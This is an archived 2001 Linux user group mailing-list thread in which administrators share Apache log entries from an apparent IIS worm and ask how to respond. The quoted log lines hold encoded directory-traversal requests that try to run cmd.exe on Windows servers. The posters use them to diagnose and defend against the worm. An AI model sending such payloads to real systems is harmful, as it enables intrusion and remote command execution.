[aclug-L] Re: Hacker or ??
[Top] [All Lists]
[Date Prev][Date Next][Thread Prev][Thread Next][Date Index] [Thread Index]
Looks like a new worm that tries to attack 16 vulnerabilities in IIS.
Wonderful for people who run Linux but are still being pounded.
Josh Brown
Anyone have any ideas to stop it or just grin and bear it?
On Tue, 18 Sep 2001, Steven Saner wrote:
>
> Appears that this is the worm that Glandix reported. I got the
> readme.exe email this morning as well. It was made to appear like a
> bounce back message from someplace.
>
> Steve
>
>
> On Tue, Sep 18, 2001 at 12:49:24PM -0500, Joshua S Brown wrote:
> >
> > We are having the same problem on all our web servers. Is this a hack or
> > something like code red?
> >
> >
> > Josh Brown
> >
> > On Tue, 18 Sep 2001, Maverick wrote:
> >
> > >
> > > Hi, all
> > > Recently I check on my apache webserver access.log
> > > and find out a lot of entrie like this:
> > > 24.254.90.73 - - [18/Sep/2001:10:44:38 -0700] "GET
> > > /scripts/..%c0%af../winnt/sys
> > > tem32/cmd.exe?/c+dir HTTP/1.0" 404 231
> > > 24.254.90.73 - - [18/Sep/2001:10:44:39 -0700] "GET
> > > /scripts/..%%35%63../winnt/sy
> > > stem32/cmd.exe?/c+dir HTTP/1.0" 400 215
> > > 24.254.90.73 - - [18/Sep/2001:10:44:41 -0700] "GET
> > > /scripts/..%%35c../winnt/syst
> > > em32/cmd.exe?/c+dir HTTP/1.0" 400 215
> > > 24.254.90.73 - - [18/Sep/2001:10:44:43 -0700] "GET
> > > /scripts/..%c1%9c../winnt/sys
> > > tem32/cmd.exe?/c+dir HTTP/1.0" 404 231
> > > .....
> > >
> > > Is that someone try to access my /var/www/scripts/?
> > > and my error.log generate something like this..
> > > Tue Sep 18 10:52:27 2001] [error] [client
> > > 24.234.20.197] File does not exist: /
> > > var/www/c/winnt/system32/cmd.exe
> > > [Tue Sep 18 10:52:28 2001] [error] [client
> > > 24.234.20.197] File does not exist: /
> > > var/www/d/winnt/system32/cmd.exe
> > > ....
> > >
> > > anyone have any idea? or did I set something wrong?
> > > or really have a hacker knocking on my door?
> > >
> > > Thanks.
> > > Mav
> > >
> > > __________________________________________________
> > > Terrorist Attacks on U.S. - How can you help?
> > > Donate cash, emergency relief information
> > > http://dailynews.yahoo.com/fc/US/Emergency_Information/
> > > -- This is the discussion@xxxxxxxxx list. To unsubscribe,
> > > visit http://tmp2.complete.org/cgi-bin/listargate-aclug.cgi
> > >
> >
> >
> > -- This is the discussion@xxxxxxxxx list. To unsubscribe,
> > visit http://tmp2.complete.org/cgi-bin/listargate-aclug.cgi
> -- This is the discussion@xxxxxxxxx list. To unsubscribe,
> visit http://tmp2.complete.org/cgi-bin/listargate-aclug.cgi
>
-- This is the discussion@xxxxxxxxx list. To unsubscribe,
visit http://tmp2.complete.org/cgi-bin/listargate-aclug.cgi
- [aclug-L] Hacker or ??, Maverick, 2001/09/18
- [aclug-L] Re: Hacker or ??, Joshua S Brown, 2001/09/18
- [aclug-L] Re: Hacker or ??, Steven Saner, 2001/09/18
- [aclug-L] Re: Hacker or ??,
Joshua S Brown <=
- [aclug-L] Re: Hacker or ??, gLaNDix (Jesse Kaufman), 2001/09/18
- [aclug-L] Re: Hacker or ??, Joshua S Brown, 2001/09/18
- [aclug-L] Re: Hacker or ??, gLaNDix (Jesse Kaufman), 2001/09/18
- [aclug-L] Re: Hacker or ??, Steven Saner, 2001/09/18
- [aclug-L] Re: Hacker or ??, gLaNDix (Jesse Kaufman), 2001/09/18
- [aclug-L] Re: Hacker or ??, Maverick, 2001/09/18
- [aclug-L] Microsoft Worm/Virus (was Re: Hacker or ??), james l, 2001/09/18
- [aclug-L] Re: Hacker or ??, Steven Saner, 2001/09/18
- [aclug-L] Re: Hacker or ??, gLaNDix (Jesse Kaufman), 2001/09/18
- [aclug-L] Re: Hacker or ??, Steven Saner, 2001/09/18
|
|